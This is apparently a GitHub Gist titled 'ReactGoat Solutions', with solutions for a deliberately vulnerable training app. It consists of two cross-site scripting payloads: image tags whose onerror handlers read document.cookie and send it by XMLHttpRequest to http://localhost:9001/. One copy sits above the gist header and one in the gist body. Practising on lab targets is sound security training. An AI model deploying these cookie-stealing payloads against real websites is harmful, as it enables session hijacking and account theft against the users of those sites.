Skip to content

Instantly share code, notes, and snippets.

<img
src='/fake'
onerror="if (document.cookie!=='teehee' && document.cookie !== '') {var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://localhost:9001/'+document.cookie); xhr.send();}"
/>
@vxermx
vxermx / level0.html
Created March 13, 2020 20:21
ReactGoat Solutions
<img
src='/fake'
onerror="var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://localhost:9001/'+document.cookie); xhr.send();"
/>